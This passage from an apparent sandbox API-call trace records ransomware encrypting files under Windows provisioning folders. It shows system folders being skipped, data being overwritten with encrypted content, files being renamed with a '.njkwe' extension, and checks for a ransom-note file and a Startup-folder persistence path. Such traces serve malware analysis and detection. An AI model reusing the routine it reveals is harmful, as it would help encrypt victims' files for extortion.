Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.422] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\41__connections_cellular_velcom (belarus)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.422] GetTickCount () returned 0x11542d2 [0079.422] GetTickCount () returned 0x11542d2 [0079.422] GetTickCount () returned 0x11542d2 [0079.422] GetTickCount () returned 0x11542d2 [0079.422] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.422] GetProcessHeap () returned 0xbe0000 [0079.422] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.422] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0079.434] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.434] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0079.435] GetProcessHeap () returned 0xbe0000 [0079.435] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.435] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.435] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.435] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.435] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.435] CloseHandle (hObject=0x43c) returned 1 [0079.435] GetProcessHeap () returned 0xbe0000 [0079.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.435] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0079.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\41__connections_cellular_velcom (belarus)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\41__connections_cellular_velcom (belarus)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.436] GetProcessHeap () returned 0xbe0000 [0079.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.436] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f3f19a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f3f19a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f3f19a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1de, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="420__C~1.PRO")) returned 1 [0079.436] lstrcmpiW (lpString1="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0079.436] lstrcmpiW (lpString1="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0079.436] lstrcmpiW (lpString1="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0079.436] lstrcmpiW (lpString1="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0079.436] lstrcmpiW (lpString1="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0079.436] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0079.436] StrStrIW (lpFirst="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0079.436] lstrcmpW (lpString1="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.436] lstrcmpW (lpString1="420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0079.436] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\420__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.436] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\420__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.437] GetTickCount () returned 0x11542e1 [0079.437] GetTickCount () returned 0x11542e1 [0079.437] GetTickCount () returned 0x11542e1 [0079.437] GetTickCount () returned 0x11542e1 [0079.437] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.437] GetProcessHeap () returned 0xbe0000 [0079.437] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.437] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1de, lpOverlapped=0x0) returned 1 [0079.438] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.438] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1de, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1de, lpOverlapped=0x0) returned 1 [0079.438] GetProcessHeap () returned 0xbe0000 [0079.438] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.438] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.438] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.439] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.439] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.439] CloseHandle (hObject=0x43c) returned 1 [0079.439] GetProcessHeap () returned 0xbe0000 [0079.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.439] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\420__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\420__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\420__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.440] GetProcessHeap () returned 0xbe0000 [0079.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.440] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f3f19a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f3f19a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f3f19a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", cAlternateFileName="421__C~1.PRO")) returned 1 [0079.440] lstrcmpiW (lpString1="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.440] lstrcmpiW (lpString1="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.440] lstrcmpiW (lpString1="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.440] lstrcmpiW (lpString1="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.440] lstrcmpiW (lpString1="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.440] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml") returned 163 [0079.440] StrStrIW (lpFirst="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.440] lstrcmpW (lpString1="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.440] lstrcmpW (lpString1="421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.440] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\421__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.440] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\421__connections_cellular_tdc sweden (sweden)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.441] GetTickCount () returned 0x11542e1 [0079.441] GetTickCount () returned 0x11542e1 [0079.441] GetTickCount () returned 0x11542e1 [0079.441] GetTickCount () returned 0x11542e1 [0079.441] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.441] GetProcessHeap () returned 0xbe0000 [0079.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.441] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0079.442] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.443] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0079.443] GetProcessHeap () returned 0xbe0000 [0079.443] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.443] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.443] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.443] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.443] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.443] CloseHandle (hObject=0x43c) returned 1 [0079.443] GetProcessHeap () returned 0xbe0000 [0079.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.443] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0079.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\421__connections_cellular_tdc sweden (sweden)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\421__Connections_Cellular_TDC Sweden (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\421__connections_cellular_tdc sweden (sweden)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.444] GetProcessHeap () returned 0xbe0000 [0079.444] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.444] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f65464, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f65464, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f65464, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", cAlternateFileName="422__C~1.PRO")) returned 1 [0079.444] lstrcmpiW (lpString1="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.444] lstrcmpiW (lpString1="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.444] lstrcmpiW (lpString1="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.444] lstrcmpiW (lpString1="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.444] lstrcmpiW (lpString1="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.444] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml") returned 158 [0079.444] StrStrIW (lpFirst="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.444] lstrcmpW (lpString1="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.444] lstrcmpW (lpString1="422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.444] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\422__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.444] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\422__connections_cellular_tele2 (sweden)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.445] GetTickCount () returned 0x11542e1 [0079.445] GetTickCount () returned 0x11542e1 [0079.445] GetTickCount () returned 0x11542e1 [0079.445] GetTickCount () returned 0x11542e1 [0079.445] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.445] GetProcessHeap () returned 0xbe0000 [0079.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.445] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0079.447] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.447] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0079.447] GetProcessHeap () returned 0xbe0000 [0079.447] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.447] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.447] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.447] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.448] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.448] CloseHandle (hObject=0x43c) returned 1 [0079.448] GetProcessHeap () returned 0xbe0000 [0079.448] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.448] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0079.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\422__connections_cellular_tele2 (sweden)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\422__Connections_Cellular_Tele2 (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\422__connections_cellular_tele2 (sweden)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.448] GetProcessHeap () returned 0xbe0000 [0079.449] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.449] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f65464, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f65464, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f65464, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", cAlternateFileName="423__C~1.PRO")) returned 1 [0079.451] lstrcmpiW (lpString1="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.452] lstrcmpiW (lpString1="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.452] lstrcmpiW (lpString1="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.452] lstrcmpiW 